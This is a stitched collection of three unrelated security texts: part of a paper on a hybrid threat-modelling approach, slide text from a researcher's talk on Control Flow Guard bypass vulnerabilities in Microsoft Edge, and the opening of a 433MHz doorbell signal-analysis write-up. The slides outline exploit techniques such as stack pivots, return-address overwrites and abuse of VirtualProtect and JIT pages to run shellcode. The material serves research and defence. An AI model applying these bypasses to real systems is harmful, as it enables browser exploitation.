bulk upload  An attacker can send malicious XML 
document that would contain nested 
entities expansion to produce amplified 
XML output that will crash processor's 
CPU/memory ( XML Entity Expansion 
Attack ), as the application allows the use 
of DTD.      ×  
Data Flow  Employee -> 
Application 
interface to 
view employee 
details  An attacker can exclude the XML 
signature from the message to send 
arbitrary request and invoke functions for 
obtaining salary details of the employees.   ×     × 
 
In this example, a  column named “Interaction” is added  to the threat modelling 
table. This enables threat modellers to document the specific interaction of the overall 
functional flow  and facilitates representation of  the threats in much more eloquent way.  
It is possible to capture “what could go wrong ” in tha t specific interaction and arrive at  
effective countermeasure s.  
Another advantage of this technique is it permits group ing of  threats for which 
the countermeasures are similar (many to one)  – this is immensely beneficial for the 
developer community. For example, the countermeasures prescribed for XML Entity 
Expansion Attack is also applicable for XML Entity Injection Attack. This attack occurs 
when the XML message contains a reference to an external entity which can execute 
an arbitrary function to obtain confidential data from the server.  Therefore, the XML 
processor should be configured to use only a local static DTD and disallow any declared 
DTD in the XML document. Grouping of threats wit h similar countermeasures helps 
developers to plan and prioritize the efforts during their implementation . This simplifies 
the whole exercise both from threat enumeration and mitigation standpoint s.  Table 4 – STRIDE -per-Interaction  
A Hybrid Approach to Threat Modelling  9 
 
 
 Limitations  of STRIDE:  The STRIDE technique helps enumerat e threats 
relating  to the elements and functional flow  of an application ; however the essence of 
‘how to mitigate ’ the threats cannot be addressed. To achieve completeness , threat 
modelling must identify and design  strong countermeasures  for the identified threats . 
Taking this a step further, documenting the appropriate implement ation 
countermeasures (secure coding guidelines) is not a feature of this technique .  
2.2.2  Attack Tree  
Attack tree  is a conceptual representation  of possible attacks against an 
application through which threats are ascertained . According to  Bruce Schneier, 
“Attack trees provide a formal, methodical way of describing the security of systems, 
based on varying attacks. Basically, the attacks against a system  are represented  in a 
tree structure, with the goal as the root node and different ways of achieving that goal 
as leaf nodes”  [6] [7]. It is a model that enables  threat analysis  from an attacker’ s 
perspective . 
In the a ttack tree , the ultimate goal of the attack is the root node, while the 
child ren and leaf node s represent the sub goals . In the tree, nodes can be either 
represented as “AND” or “OR” nodes . Let us consider the following diagram:  
 
 “AND” represents different or multiple steps required to achieve  the goal .  In figure 
3 the goal is to modify the /etc/passwd file .  Without legitimate access to the server 
Figure 3 – Attack  Tree AND  
OR OR 
A Hybrid Approach to Threat Modelling  10 
 
 
 an attacker must  gain access to the server ( remote login ) AND  escalate to root 
privilege . 
 “OR” represents different ways to achieve the goal .  In figure 3 , an attacker can 
either exploit the vulnerability of the webserver OR SSH service  to establish remote 
login  or access to the server . Similarly , to escalate to root privilege, an attacker can 
either exploit linux -kernal vulnerability OR a  vulnerable service that  runs as root.   
  Once the possible attacks against an application h ave been modelled in a tree 
structure, one can assign attribute s to those attacks. Following are the attributes that can 
be applied:  
 Probability  of an attack with a standard categorization - for example High, Medium, 
Low 
 Cost of an attack considering the tools / software required to perform the attack  
 Competency requir ed to perform the attack – for example, script kiddie, basic 
working knowledge, expert  or specialist  
 Impact to business  – for example, reputation damage, financial loss, non-
compliance to regulatory requirements and privacy violation  
  Other than  considering the attacker’s goal, an attack tree can be built based on: 
 Attack patterns  such as injection attacks, Man-in-the-Middle attack s, Denial of 
Service , and Advanced Persistent Attack ( Malware ). 
 Attacks specific to protocols  - application security researcher Ivan Ristic performed 
an interesting threat model exercise focusing on the SSL protocol  [8].  
  Building An Attack Tree : Following are the 3 simple steps to construct an 
attack tree:  
STEP -1: Identify the goals – each goal can be a separate attac k tree, in case of large 
attack vector even sub -goals can be represented in separate tree structure s. 
STEP -2: Identify the various categories of attacks required to accomplish the goals.  
STEP -3: If a generic attack tree library exist s, it can be plugged into the attack tree 
being constructed . 
A Hybrid Approach to Threat Modelling  11 
 
 
   Consider  a scenario w here attacks against administrative credentials and 
functions have to be explored. This being the over all goal, it can be further broken down 
into two separate sub -goals:  
 To obtain admin credentials  
 Perform administrative function without appropriate authorization  
Following representations depict the attack tree for these sub -goals:  
 
 
Figure 4 – Attack Tree to obtain Admin credentials  
Figure 5 – Attack Tree to obtain Administrative Functions  
A Hybrid Approach to Threat Modelling  12 
 
 
Limitations  of Attack Tree:  Upon  identification of the attacks to accomplish 
the goal, attributes of the attacks ha ve to be considered. As ment ioned earlier,  details  
such as probability of the attack, cost of the attack, and countermeasures ha ve to be 
documented to achieve the completeness of the exercise. However,  it is impossible to 
capture all those details , and adding such information will complicate the tree structure  
at the expense of readability. Instead t hese attacks have  to be assigned a reference 
number and their attributes must  be documented against their corresponding attack in a 
separate table. Moreover , this model is suited to  provid ing a high-level representation 
of the attacks, but does  not suit modelling  of threats at a more granular level.   The attack 
tree when used independently as a threat modelling technique does not yield the best 
result.  
2.2.3  Attack Library  
Attack Library is a collection of attacks for finding threats against the 
application  being developed  [9]. This is a nother type of threat modelling technique 
available to identify threats by looking from  an attacker’s  perspective. The idea is to 
provide as much details as po ssible for an attack type (for example code injection) to 
help threat modellers or the develop er community to understand the landscape of 
threats . Any threat modelling technique adopting the attacker’s  perspective is more of 
a checklist model , i.e. traverse the library of attacks applicable in the context of the 
application, analyse  whether the threats are handled , and identify countermeasures.  
An attack library can be constructed based on the following:  
 List of possible attacks against the applica tion 
 List of potential vulnerabilities in the application  
 List of software weakness (programming errors) introduced in the application  
  Before proceeding, let’s review  the difference between a software vulnerability 
and a weakness. Software weakness es can be viewed as programming errors that may 
lead to potential vulnerabilit ies in the application , while a s oftware vulnerability is a 
flaw in the application that can be used by an attacker to gain access or deny service. 
Hence both of these aspect s shou ld be considered in the attack library.  
A Hybrid Approach to Threat Modelling  13 
 
 
   Organizations can  either develop  their own library or leverage form al lists or 
dictionaries  published  by the security community or consortium such as Open Web 
Application Security Project (OWASP), Common Weakness and Enumeration  (CWE) , 
and Common Attack Pattern Enumeration and Classification  (CAPEC) . Let us look at 
each of these libraries : 
  OWASP  [10]: Open Web Application Security Project is an open community 
dedicated to enabling organizations to conceive, develop, acquire, operate, and 
maintain applications that can be trusted. They create best practices methodologies, 
documentation, articles, and too ls to ensure development of secure applications. 
Periodically they release a list of the top ten web application vulnerabilities to educate 
developers and security professionals about the  most important web application 
security weakness and its consequence s. For each of these vulnerabilities , OWASP 
provides detailed threat agents, attack vector s, security weakness es, technical impact, 
business impact, countermeasures,  and examples of attack scenario s. OWASP proposed 
security practices and methodologies are widely used for  web application project s, 
hence it is be suitable  to an exercise such as threat modelling.  
  CAPEC  [11]: It is a publicly available, community -developed list of common 
attack patterns along with a comprehensive schema and classification taxonomy. Attack 
patterns are descriptions of common methods for exploiting software systems. It 
describes how an adversary ca n attack the vulnerable system and common techniques 
used to tackle these challenges. These patterns also help categorise the attacks and teach  
the development community to better understand and effective ly defend  against the 
attacks . CAPEC are well struc tured with a total of 504 attack patterns grouped into 16 
mechanism of attack s (as per version 2.8) . This is available in this link 
https://capec.mitre.org/data/definitions/1000.html  
   
  CAPEC provides exhaustive details about the attacks  :  summary of attack, 
attack execution flow, attack prerequisites, typical severity, typical likelihood of 
exploi t, methods of attack, examples – instances, attacker skills or knowledge required, 
resources required, probing technique, indicators -warnings of attack, solution and 
mitigation, attack motivation – consequences, injection vector, payload, activation 
A Hybrid Approach to Threat Modelling  14 
 
 
 zone, payload activation impact, security requirements, CIA impact, and technical 
context.  Although this list is rich with information, h ow much of these details are 
necessary for performing an effective threat modelling  exercise ?   
  Any organization or team  new to threat modelling can be overwhelmed with 
information and miss out on important aspects  to consider . Even experienced threat 
modellers may find this method more time consuming and thus adversely affecting  
productivity.  
 CWE  [12]: It is a formal list or dictionary of common software weaknesses that 
can occur in software architecture, design, code or implementation that may lead to 
exploitable security vulnerabilities.  In common terms, CWE has identified critical 
programming errors that may lead to software vulnerabilit ies. CWE serve s as a standard 
measuring parameter  for software security t ools targeting these weaknesses. The 
purpose  is to prov ide a common baseline standard for weakness identification, 
mitigation, and prevention efforts.  As per version 2.9 there are in total 1004 CWEs 
which can be gro uped based on various criteria. Each of the primary clusters ha ve 
secondary clusters. Like CAPEC, the  primary cluster is to categorize softwa re weakness 
for better understanding. Details provided in each CWE include:  description, applicable 
platform, common consequences, demonstrative example, observed examples, and 
related attack patterns.  
  Procedure of using Attack Library technique  in a threat modelling exercise 
is simple:  
STEP 1: Build an attack library or identify an existing library that can provide 
information about attack patterns.  
STEP 2: Identify the area (based on the development scope or project) for which threat 
modelling exercise is applicable.  
STEP 3: Review the application  that was developed  against each of the attack / 
vulnerability / weakness in the attack library  
STEP 4: Documen t the potential threats and countermeasures.  
  Let us consider a scenario w here a threat modelling exercise using Attack 
Library technique is performed for an application. Key focus area s relating to web 
application security, at a broad -level, can be categorized into the following:  
A Hybrid Approach to Threat Modelling  15 
 
 
  authentication  
 authorization  
 cryptography  
 session management   data validation  
 secure configuration  
 logging  
 error handling  
 
  Each of the above categories is considered  in relation to the relevant references 
in the attack library. The following represents the references in the library for 
Authentication:  
Weakness  Vulnerability  Attack  
o CWE -287: Improper 
Authentication  
o CWE -288: Authentication 
Bypass Using an Alternate Path 
or Channel  
o CWE -289: Authentication 
Bypass by Alternate  
o CWE -290: Authentication 
Bypass by Spoofing  
o CWE -307: Improper Restriction 
of Excessive Authentication 
Attempts  
o CWE -308: Use of Single -factor 
Authentication  o A2-Broken 
Authentication and 
Session Management  o CAPEC -114: 
Authentication Abuse  
o CAPEC -115: 
Authentication Bypass  
o CAPEC -49: Password Brute 
Forcing  
o CAPEC -302: 
Authentication Bypass by 
Assumed -Immutable Data  
o CWE -305: Authentication 
Bypass by Primary 
Weakness  
o CWE -308: Use of Single -
factor Authentication  
 
  By creating a library for each of the application security scheme s, it is possible 
to iterate each of these entries against the application design and identify issues . The 
coverage and depth of the attack library should depend on the context and criticality of 
the application. For example, a multi -factor authentication mechanism should be 
considered for an internet banking application, but the same may not be required in  an 
online accommodation / travel application.  
  Limitations  of Attack Library:  There are some significant limitation s in this 
technique:  
 Suitable as a check -list model, hence cannot be applied during the design phase.  
A Hybrid Approach to Threat Modelling  16 
 
 
  Information rich and needs referencing  which may lead to time consuming and a 
tedious exercise  (trade -off between exhaustive details vs productivity) .   
 Countermeasures suggested in the attack library (OWASP, CAPEC, CWE) are 
abstract or at high -level, and may not align to programming language or framework 
used in the organization.  
 This technique helps to think from attacker’s perspective, but pos es a chal lenge to 
structure a way to address the defence against these attacks.  
 
2.3 Hybrid Model  – An Effective Approach to Threat Modelling  
As discussed in the previous section s, there are limitations when each of these 
threat modelling techniques are implemented independently. When implemented as 
separate techniques, some of the key aspects required for threat modelling may be 
missed, thus impacting the productivity and comprehe nsiveness of the exercise. 
Therefore the optimal approach is to adopt a hybrid model draw ing from  the best of 
each of these techniques.  
  To perform a productive and comprehensive threat modelling , include the  
following three aspects:  
 Structure d approach  
 Optimum detail 
 Readab ility 
  Structure d Approach : A successful process must  be schematised  and should 
adopt a procedure. It enables establ ishment of  the objective , capture  of appropriate 
details, and implement ation of  the agreed procedure to achieve the set objective. For 
example, a software development team adopt s a suitable software development 
lifecycle model such as agile or waterfall so that objectives are clearly  understood and 
translated  into desired software products  in a timely manner. Similarly , threat 
modelling should embrace a structure d approach  so that  desired outcome s can be 
achieved from the exercise.  
  Optimum Detail : Providing information that can be easily interpreted and acted  
upon serves as a  critical factor to the successful outcome of a process . The consumer s 
A Hybrid Approach to Threat Modelling  17 
 
 
 of this exercise are mostly software developers / architects / testers who might not 
necessarily be security expert s. Hence providing either excessive  information or 
minimal  details will not only impact the result  of the exercise but also the security of 
the software application. Therefore publishing the optimum amount of detail will 
immensely contribute to the successful outcome of the exercise.  
  Readability : It is not adequate  if the exercise has a structured approach  and 
contains optimum  details  alone . Representation of data in the best possible way 
guarantees the completeness of the exercise. In software development, the best way to 
represent complex information or work flow  within an application is via  a data flow 
diagram (DFD). A flow chart may not suit this scenario. Likewise in threat modelling 
the data should be presented in a readable format , contribut ing to the overall 
simplification of the exercise . The threat modelling process  can be represented as 
follows:  
 
 
 Design Analysis : The first step is the s tudy of DFD or architecture diagrams to 
obtain knowledge about the data flow in the application component.  If required the 
Figure 6 – Threat Modelling Process  
A Hybrid Approach to Threat Modelling  18 
 
 
 areas that may require further  consideration  from the application security context  
should be  marked . 
 Threat Identification :  To identify the threat or what could go wrong, the following 
elements are considered:  
o Establish Trust Boundary : Trust boundary is  a line beyond which the web 
application will not have control over the data.  This indicates that any data sent 
from elements  beyond this line should always be validated before being 
processed. The o bjective of establishing a trust boundar y is to define  the 
potential threat  actors i.e. users who can launch an attack against the application . 
In a diagram , the trust boundary is often depicted as dotted line s representing 
trust for components within the line s. Any component beyond this boundary 
should be treated as unknown and should be scrutinized.  
 
 
o Identity Threat Actors: Once a trust boundary is established the threat modellers  
will know the entities whose  request or input should always be validated. 
Anyone who pose s a threat to the web application can be classified as a threat 
actor. This can include  legitimate users of the application or adversar ies (not 
having approved access to the web application)  on the internet trying to attack 
the web application. While analysing  complex enterpri se applications that 
contain multiples user roles  with varying  privileges, it is often essential  to create 
a list of threat actors. Defining these threat actors is complet ely based on the 
criticality and business context of that web application.  
o Identity Attack Surface : Attackers may launch their payload from various entry 
points in the application  and ultimately impact the business. Threat actors define 
Figure 7 – Trust Boundary  
A Hybrid Approach to Threat Modelling  19 
 
 
 “who will attack” whereas attack surface  indicate s “from where  will the attack 
originate ”. While examining the DFD, the points where data transacted  from 
untrusted sources are identified and mark ed as potential entry points . For 
example, a web application authentication page w here user s submit  credentials  
(username and password  via input fields ) to access protected resources . This 
can be an entry point for the attacker to conduct  a brute-force attack or  SQL 
injection attack  via these input fields.  Identifying the attack surface  completes 
the process of threat enumeration,  as one would have  adequate  information on 
the trust boundary, pot ential adversaries, and the point  from where the attack 
will be launched.   
 Threat Categorization : The objective of threat categorization is to frame the 
countermeasures for the given scenario. There are bound to be challenges while 
categorizing, especially when threats overlap  multiple categories.  In such situation s, 
mark the threats in the applicable categori es, but use the primary attack objective  to 
help identify the countermeasures. For example, consider  a threat  scenario w here a 
session  id is not well protected (uses weak hashing algorithms ). An adversary 
attack s and obtain s a valid session id , while either at rest (cached in web browser) 
or in transit , and then use s it to impersonate a  legitimate user. A typical dilemma 
may be to categorize it as either information disclosure , spoofing , or both. In this 
case, the objective of the attack is  to obtain  the exposed session id while the result 
of the compromise may lead to spoofing . Because the attack objective relates to 
information disclosure, categorized the threat as  information disclosure  and 
document the associated countermeasure: create session id s using  strong 
cryptographic  algorithms and transmit values over  secure communication channel s. 
 Threat Mitigation :  The f ollowing points  have to be addressed to arrive at an  
effective threat mitigation  plan: 
o Countermeasures : This is a set of action s taken to defend the attack for the 
given threat scenario. In this section, threat modellers should provide both 
conceptual and technical details to secure the web application. For example, 
the countermeasure for SQL Injection Attack : using of  parameteriz ed 
queries , stored procedures , and whitelist input validation  must be  explain ed 
conceptually for the software developers to understand the approach for 
defen ding against such an attack.   
A Hybrid Approach to Threat Modelling  20 
 
 
 o Reference to Best Practices : A guide for implementing the identified 
countermeasures should be presented as r eference s to well-known  standards 
such as OWASP and CWE or secure coding notes built in an organization  
that contain a summary about the a ttack and compliant code snippets , in the 
programming language used in the organization .  
The following representation depicts mapping of the appropriate threat modelling 
technique to the threat modelling  activity : 
 
  As indicated in the above diagram, the STRIDE technique should be used for 
threat identification and threat categorization, and attack library for threat mitigation. 
Attack tree should be used to provide  an abstract view about  attack s against a particular 
feature or component of an application . The f ollowing points provide  the rationale  
behind this mapping:  
 STRIDE (per -element and per -interaction) will provide the required  context , in 
terms of the elements involved and specific interaction  or flow  for a feature in the 
application,  enabling  threat modellers to cogitate upon the potential threats  and 
develop threat scenarios .  
 Threats are  then categorized by considering each of the attack propert ies in STRIDE 
and marking the most appropriate one for the given threat scenario.  
 Threat mitigation will be formulated  by analysing the possible attack s for the  threat 
scenario from rich information contained in the Attack library / reference.   
  The threat modelling exercise has to be documented so that software developers 
use the data while developing the application and also for future reference. Hence it is 
imperative to develop a suitable template to gather and represent the data by adopting 
Figure 8 – Threat Modelling Hybrid Model 
A Hybrid Approach to Threat Modelling  21 
 
 
 the hybrid model  covering the key aspects of a structured approach, optimum details 
and readability . The template is divided into two parts:  
 For captur ing data for scoping  
 For captur ing data relating to activities in threat modelling  
Template for capturing  the scoping details:  
 
 
Table -1: The first four rows capture the summary about the specific area selected for 
threat modelling, details about the team and references to the design that will be 
analysed.  
Table -2: Various users of the application and even external web services or systems 
interacting with the application are mentioned along with their scope to the trust 
boundary.  
Table -3: Threat actors: potential threat agents or entities who can harm the a pplication 
are documented.  
Table -4: Attack surface: different entry points  by which the threat actors can launch 
their payload and gain illegitimate access to the application .  
Table -5: Threat consideration:  threat modellers can highlight the schemes that are 
considered as part of this threat modelling exercise, as it provides a nice overview and 
understanding about areas covered in this exercise.  
Template to capture the data pertaining to threat modelling:  
Figure 9 – Threat Modelling Template for scoping  
A Hybrid Approach to Threat Modelling  22 
 
 
Col-1: Ref No: a nomenclature to uniquely identify a threat scenario. This can be 
subsequently mentioned in various stages in the SDLC process to ensure the threat has 
been adequately handled.  
Col-2: Elements: indicates the element ( external entity, data flow, data store, and 
business logic) to which the threat is mapped. This aids consider ation of the  threats 
specific to those  elements.  
Col-3: Interaction: The specific flow in the application to which the threat scenario will 
be addressed.  
Col-4: Threat scenario: captures “what could go wrong” considering the element 
involved and specific flow in the application.  
Col-5 to 10: STRIDE: these columns are used to categorize the identified threat. As 
mentioned earlier, the threat can be categorised in more than one attac k property which 
will help in determining  precise countermeasures.  
Col-11: Countermeasures: conceptual details about the security controls that needs to 
be implemented to tackle the identified threat scenario. The countermeasures need  to 
be effective in order to ensure that the threats are not realized.  
Col-12 to 14: Attack library :  illustrates the best practices by providing a description of 
the possible attacks, and secure coding practise s to prevent the same. This serves as a 
guideline for softwar e developers while implementing the countermeasure  for the threat 
scenario . It is in the best interest of the organization  to develop their own attack library 
or secure coding guidelines as it will be aligned to their technology stack (programming 
language  and development frameworks) . Solutions provided in CAPEC or CWE may 
be abstract and not in the programming language adopted by the organization. However 
the intention is to provide a direction for the software developers on secure coding 
practices which w ill result in developing secure applications.  

A Hybrid Approach to Threat Modelling  23 
 
 
 3. Conclusion  
  In the face of increasing attacks at the application layer and enterprise 
applications moving towards the cloud, security is viewed as  a key business 
requirement. Understanding the threat landscap e is a perquisite  for building secure 
application s.  Threat modelling help s organization s realise their own threat landscape 
and detect and mitigate flaws early in the development process .   
  There are various techniques published for conducting a threat modelling 
exercise. The most common techniques such as STRIDE, Attack Tree, and Attack 
Library are discussed in this paper. Organizations tend to be prejudiced towards a 
particular technique while performing the exercise. However this a pproach will be 
detrimental to th e objective of performing an effective and comprehensive exercise.  
The STRIDE technique may be good in enumerating the threats however  does not aid 
in developing cou ntermeasures / mitigation plan . Attack Tree provide s an overview 
about the attack surface at some level of abstraction which result s in not capturing data 
essential for un derstanding the threat scenario . Finally Attack Library may provide 
information about the attack vectors and be suitable as checklist mod el, it may not 
contribute to the completeness we expect in the exercise.  
  To reap  the complete benefit from the exercise we have to utilize a combination 
of each of these techniques to perform the various activities in the threat modelling 
process. Criti cal success factors for the threat modelling exercise lies in adopt ing a 
structured approach, providing  optimum details and readability.  Hence this paper 
proposes a hybrid model that would implement the techniques that best suit each of the 
activities in threat modelling.  
 
Acknowledgments  
I wish to thank Mr. Marty Solomon - Senior Director Software Security Architecture 
and Mr. Tom Connor – Director Software Engineering, Pegasystems Inc. for providing 
their valuable feed back  and being of support.  
A Hybrid Approach to Threat Modelling  24 
 
 
 References  
 
[1]  Bird, J., Johnson, E., & Kim, F. (2015, May). 2015 State of Application Security: Closing 
the Gap.  Retrieved from https://www.sans.org/reading -room/whitepapers/analyst/2015 -
state-application -security -closing -gap-35942  
[2] Shostack, A. (2014). In Threat Modeling Designing for Security  (p. 61).  
[3] Shostack, A. (2014). In Threat Modeling Designing for Security  (p. 78).  
[4] Osterman, L. (2007, September 10). Threat Modeling Again, STRIDE per Element . 
Retrieved from https:/ /blogs.msdn.microsoft.com/larryosterman/2007/09/10/threat -
modeling -again -stride -per-element/  
[5] Shostack, A. (2014). In Threat Modeling Designing for Security  (p. 80).  
[6] Shostack, A. (2014). In Threat Modeling Designing for Security  (p. 87).  
[7] Schneier, B. (1999, December). Attack Trees . Retrieved from 
https://www.schneier.com/academic/archives/1999/12/attack_trees.html  
[8] Ristic, I. (2009, September 09). SSL Threat Model . Retrieved from 
https://blog.ivanristic.com/2009/09/ssl -threat -model.html  
[9] Shostack, A. (2014). In Threat Modeling Desiging for Security  (p. 101).  
[10] OWASP Top 10 Vulnerabilities . (2013). Retrieved from 
https://www.owasp.org/index.php/Top_10_2013 -Top_10  
[11] CAPEC: Mechanisms of Attack . (2015, December). Retrieved from 
https://capec.mitre.org/data/definitions/1000.html  
[12] CWE: Software Fault Pattern . (December). Retrieved from 2015: 
https://cwe.mitre.org/data/graphs/888.html  
 
 
 How to find the vulnerability to bypass the Control Flow Guard Henry Li(@zenhumany) 
About me • Trend Micro CDC Zeroday discovery Team • Security Researcher • Six Years Experience • Expert in browser 0day vulnerability analysis, discovery and exploit.  • Won the Microsoft Mitigation Bypass Bounty in 2016 • Won the Microsoft Edge Web Platform on WIP Bounty • MSRC Top 17 in year 2016 • twitter/weibo: zenhumany 

Why we need CFG bypass vulnerability 
• Even your have arbitrary read/write vulnerability, you need bypass CFG to run shellcode • No universal CFG bypass method Why we need CFG bypass vulnerability 
• Attack Surface • Find vulnerability • Exploit Framework • Improvements Agenda 
• CFG attribute Change Functions • write return address • No Control Flow Guard check • CFG sensitive API  Attack Surface 
Attack Surface 1 • CFG ATTRIBUTE CHANGE FUNCTIONS • VirtualAlloc • VirtualProtect • SetProcessValidCallTargets Attack Surface 1 
• VirtualProtect • flNewProtect 0x40 • Memory Protection PAGE_EXECUTE_READWRITE • The address in the pages are  all CFG valid • flNewProtect 0x40000040 • Memory Protection PAGE_EXECUTE_READWRITE • The address in the pages are  all CFG  invalid • VirtualAlloc • flProtect 0x40  • Memory Protection PAGE_EXECUTE_READWRITE • The address in the pages are  all CFG valid • flProtect 0x40000040 • Memory Protection PAGE_EXECUTE_READWRITE • The address in the pages are  all CFG  invalid 
VirtualProtect-VirtualAlloc 
• SetProcessValidCallTargets • Flags • CFG_CALL_TARGET_VALID  • Otherwise, it will be marked as invalid 
SetProcessValidCallTargets 
Chakra Engine Architecture 
JIT Memory Management 
• In Microsoft Edge, there are two types of JIT: • javascript JIT, in the chakra.dll Module. • SHADER JIT, in the d3d10warp.dll Module. Attack Surface 1 
• Because the CFG does not check the ret, we can write the return address to bypass the CFG. • In chakra engine, the interpreting execution mode will simulate a function call stack.  The implementation will save some stackframe information on a special object in the heap.  • If we have arbitrary read and write vulnerability, we may can infoleak some stack information. Attack Surface 2 write the return address 
Interpreter StackFrame 
• JIT code is implemented in the runtime. • The CFG support in JIT may be manual maintenance. • Pay attention to the JIT code to find indirect call with no CFG check. Attack Surface 3 Indirect call with no CFG check 
• Use these function to bypass CFG • VirtualProtect • VirtualAlloc • longjmp/setjmp • ......  Attack Surface 4 CFG Sensitive API 
• Six CFG bypass vulnerabilities Notes: All of the following bypass vulnerabilities suppose you have arbitrary read/write vulnerability   Find Vulnerability 
• eshims!VirtualProtect to bypass CFG and DEP • Vuln Type: Call Sensitive API out of context • Module: Eshims • Operation System: Windows 10 14367 32 bit • BYPASS CFG/DEP  Vuln 1 
• eshims.dll is a module in Microsoft Edge • eshims have following hook functios,the functions are CFG valid. 
Vuln 1 
Vuln 1 
Vuln 1: Exploit Method 
• CodeStorageBlock::Protect function to bypass CFG and DEP • Vuln Type:Call Sensitive API out of context • Module: D3D10Warp.dll • Operation System: Windows 10 14393.5 32 bit • BYPASS CFG/DEP Vuln 2 
CodeStorageBlock(0x38)  0x00 pVtable  0x04 pCodeStorage         0x08 begianAddressofCodeStorageSection  0x30 pSectionCount  • CodeStorageBlock::Protect is CFG valid 
CodeStorageSection(0x18)  0x00 pCodeStorageChunk  0x04 pPrevCodeStorageSection  0x08 pNextCodeStorageSection  0x0c baseAddress  0x10 size  0x14 flag_busy :byte  Vuln 2 
Vuln 2 
Vuln 3 
Vuln 2 
Vuln 2:Exploit Method 

• Use InterpreterThunkEmitter to bypass CFG • Vuln Type:  No Control Flow Guard check • Module: chakra.dll • Operation System: Windows 10 14328 32 bit • Bypass CFG Vuln 3 
Vuln 3:Js Function Interpreting Execute 
Vuln 3: InterpreterThunkEmitter 
Vuln 3 • BYTE* InterpreterThunkEmitter::GetNextThunk(PVOID* ppDynamicInterpreterThunk) • { •     Assert(ppDynamicInterpreterThunk); •     Assert(*ppDynamicInterpreterThunk == nullptr); •   •     if(thunkCount == 0) •     { •         if(!this->freeListedThunkBlocks.Empty()) •         { •             return AllocateFromFreeList(ppDynamicInterpreterThunk); •         } •         NewThunkBlock(); •     } BYTE* InterpreterThunkEmitter::GetNextThunk(PVOID* ppDynamicInterpreterThunk) {     Assert(ppDynamicInterpreterThunk);     Assert(*ppDynamicInterpreterThunk == nullptr);       if(thunkCount == 0)     {         if(!this->freeListedThunkBlocks.Empty())         {             return AllocateFromFreeList(ppDynamicInterpreterThunk);         }         NewThunkBlock();     }  
Vuln 3 const BYTE InterpreterThunkEmitter::InterpreterThunk[] = {     0x55,                             //   push        ebp                ;Prolog - setup the stack frame     0x8B, 0xEC,                       //   mov         ebp,esp     0x8B, 0x45, 0x08,                 //   mov         eax, dword ptr [ebp+8]     0x8B, 0x40, 0x00,                 //   mov         eax, dword ptr [eax+FunctionBodyOffset]     0x8B, 0x48, 0x00,                 //   mov         ecx, dword ptr [eax+DynamicThunkAddressOffset]                                       //   Range Check for Valid call target     0x83, 0xE1, 0xF8,                 //   and         ecx, 0FFFFFFF8h     0x8b, 0xc1,                       //   mov         eax, ecx     0x2d, 0x00, 0x00, 0x00, 0x00,     //   sub         eax, CallBlockStartAddress     0x3d, 0x00, 0x00, 0x00, 0x00,     //   cmp         eax, ThunkSize     0x76, 0x07,                       //   jbe         SHORT $safe     0xb9, 0x00, 0x00, 0x00, 0x00,     //   mov         ecx, errorcode     0xCD, 0x29,                       //   int         29h     //$safe     0x8D, 0x45, 0x08,                 //   lea         eax, ebp+8     0x50,                             //   push        eax     0xB8, 0x00, 0x00, 0x00, 0x00,     //   mov         eax, <thunk>//static InterpreterThunk address     0xFF, 0xE1,                       //   jmp         ecx     0xCC                              //   int 3 for 8byte alignment };  
Vuln 3:Set Dynamic  InterpreterThunk  Address 
Vuln 3:Dynamic InterpreterThunk 
Vuln 3: Exploit  
Vuln 4  • Write the return address to bypass CFG and DEP • Vuln Type: write return address • Module: chakra.dll • Operation System: Windows 10 14352 32 bit • BYPASS CFG/RFG Vuln 4 
Vuln 4 
Vuln 4 
Vuln 4 • InterpreterHelper will call following function 
Vuln 4 
Vuln 4 • InterpreterStackFrame • 0x48  addressOfReturnAddress Vuln 4 
Vuln 4: Exploit  Vuln 4: Exploit Method 

• Use Chakra Recycler Memory pageheap to bypass DEP and CFG • Vuln type: Data Only Attack • Module: chakra.dll • Operation System: Windows 10 14328 32 bit • BYPASS CFG/DEP  Vuln 5 
Vuln 5 
Vuln 5 
Vuln 5 Vuln 5 

Vuln 5 
Vuln 5 
Vuln 5: Exploit 
Vuln 5:Exploit Method 
Vuln 6 • Use JIT PAGE to bypass CFG and DEP • Vuln Type: Data Only Attack • Module: chakra.dll • Operation System: Windows 10 14361 32 bit • BYPASS CFG/DEP Vuln 6 
Vuln 6 
Vuln 6 
Vuln 6 
Vuln 6 
Vuln 6:Exploit 
Vuln 6:Exploit Method 
Vuln 6:Exploit Vuln 6:Exploit Method 

• Write Return Address • VirtualAlloc/VirtualProtect Exploit Framework 
Exploit Vuln 4:Get addressofReturnAddress 

Exploit Vuln 4 What to write in the addressOfReturnAddress? Shellcode address? Stack pivot address xchg eax,esp 
Interpreter CallStack 

Construct a function, I call it StackPivot,do two things: I. write the stack pivot gadget address to the return address II.Return shellcode_address/2 function stackpivot_func( ) {   //write the return address is the stack_pivot    return shellcode_address/2; } Exploit Vuln 4:stackpivot function 

• The representation of an integer in memory(on x86) • In chakra engine, script defined an integer is m, in memory it’s  2*m + 1 Exploit Vuln 4:stackpivot function 
Exploit Vuln 4: Stackpivot function 

Exploit Vuln 4: Stackpivot function 

BYPASS RFG • InterpreterStackFrame::InterpreterThunk • eax, rax save the return value. 
BYPASS RFG 
VirtualAlloc/VirtualProtect Exploit 
• Addressing CFG coverage gaps • Disable RtlRemoteCall when CFG is enabled • compiler directive: __declspec(guard(suppress))  • Setjmp/Longjmp hardening • Arbitrary Code Guard Improvements 
• Not for CFG, actual effect on CFG have a great impact • Prohibited to modified PAGE_EXECUTE to PAGE_EXECUTE_READWRITE • Prohibited to modified PAGE_READWRITE to PAGE_EXECUTE_READWRITE • Kill using Virtualalloc/VirtualProtect methods to bypass CFG. Arbitrary Code Guard 
• Bypass that rely on modifying or corrupting read-only memory • _guard_check_icall_fptr • write return address( RFG not enabled) • CFG friendly  API which is CFG valid • Data Only Attack 
Exist Attack Surface 
• Jack Tang : Co-found MSRC 33966  • Kai Yu Acknowledgement 

references • Yunhai Zhang How To Avoid Implement An Exploit Friendly JIT • David WestonɺMatt Miller Windows 10 Mitigation Improvements • Henry Li Control Flow Guard Improvements in Windows 10 Anniversary Update  433MHz ASK signal analysis
Wireless door bell adventure
Author: Paul Rascagnères - @r00tbsd
Graphic designer: Chloé
Date: 9th May 2015
Version: 1.0
This work is licensed under a Creative Commons Attribution - NonCommercial - ShareAlike 4.0 International License.

Contents
#1. Introduction.................................................................................................................................... 3
1.1 RF Hardware.............................................................................................................................. 3
1.2 victim: wireless door bell ........................................................................................................... 4
1.3 Software..................................................................................................................................... 4
1.4 Extra hardware ........................................................................................................................... 5
#2. Identify the signal ........................................................................................................................... 6
2.1 Read the bell's box ..................................................................................................................... 6
2.2 GQRX........................................................................................................................................ 6
